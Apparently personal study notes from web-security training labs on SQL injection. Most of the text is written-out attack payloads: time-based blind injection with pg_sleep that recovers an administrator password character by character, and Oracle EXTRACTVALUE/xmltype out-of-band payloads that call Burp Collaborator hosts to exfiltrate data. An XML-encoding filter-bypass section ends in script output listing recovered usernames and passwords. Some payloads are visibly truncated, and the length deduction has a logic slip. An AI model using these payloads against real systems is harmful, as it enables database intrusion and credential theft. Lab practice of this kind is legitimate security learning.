' || (select case when (username='administrator' AND LENGTH(password)>1) then pg\_sleep(10) else pg\_sleep(0) end from users)--

Its respone after 10 seconds which Means password is greater then 1

' || (select case when (username='administrator' AND LENGTH(password)>20) then pg\_sleep(10) else pg\_sleep(0) end from users)--

its response before 10 seconds which means its greater then 20

' || (select case when (username='administrator' AND LENGTH(password)>10) then pg\_sleep(10) else pg\_sleep(0) end from users)--

its response after 10 seconds which means its greater then 19

which means its 20 charaters.

Finding the password

' || (select case when (username='administrator' AND substring(password,1,1)='a') then pg\_sleep(10) else pg\_sleep(0) end from users)--

The passowrd first letter is not 'a'

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

q l y k y x r j y 1 q 9 t z t s 7 f u v

qlykyxrjy1q9tzts7fuv

#### Blind SQL injection with out-of-band interaction

Notes:-

Blind SQL injection with out-of-band interaction

Goal :- A sql injection which cause DNS lookup

Analysis:-

Collabirator

fn6ta5icbcd3hdecaa80rlgkzb55tu.burpcollaborator.net

Don't know the database so used the SQL injection Cheatsheet.

Oracle:-

SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual

'||SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual--

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--

k3obj571p3ve1v956e0h2mrwangd42.burpcollaborator.net

#### Blind SQL injection with out-of-band data exfiltration

Notes:-

Blind SQL injection with out-of-band data exfiltration

Goal :- A sql injection which cause HTTP lookup and the administrator credentials.

Analysis:-

Collabirator

pun4rcetr0fey2gvrsyxu75980eq2f.burpcollaborator.net

Don't know the database so used the SQL injection Cheatsheet.

Oracle:-

TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--

#### SQL injection with filter bypass via XML encoding

document.getElementById("stockCheckForm").addEventListener("submit", function(e) {

checkStock(this.getAttribute("method"), this.getAttribute("action"), new FormData(this));

e.preventDefault();

});

function checkStock(method, path, data) {

const retry = (tries) => tries == 0

? null

: fetch(

path,

{

method,

headers: { 'Content-Type': window.contentType },

body: payload(data)

}

)

.then(res => res.status === 200

? res.text().then(t => isNaN(t) ? t : t + " units")

: "Could not fetch stock levels!"

)

.then(res => document.getElementById("stockCheckResult").innerHTML = res)

.catch(e => retry(tries - 1));

retry(3);

}

window.contentType = 'application/xml';

function payload(data) {

var xml = '';

xml += '';

for(var pair of data.entries()) {

var key = pair\[0];

var value = pair\[1];

xml += '<' + key + '>' + value + '\</' + key + '>';

}

xml += '';

return xml;

}

PS G:\My Drive\Hasanrehni\WraithFall\ShadowGuardain\Programming\Python\SQLi\SQL injection with filter bypass via XML encoding> python .\SQLicheck.py

wiener:ovq42j1ejylyinolupk3

977 units

administrator:eodcqpdez9pmykirlhbr

carlos:s963hb2lblobvkdyitv1
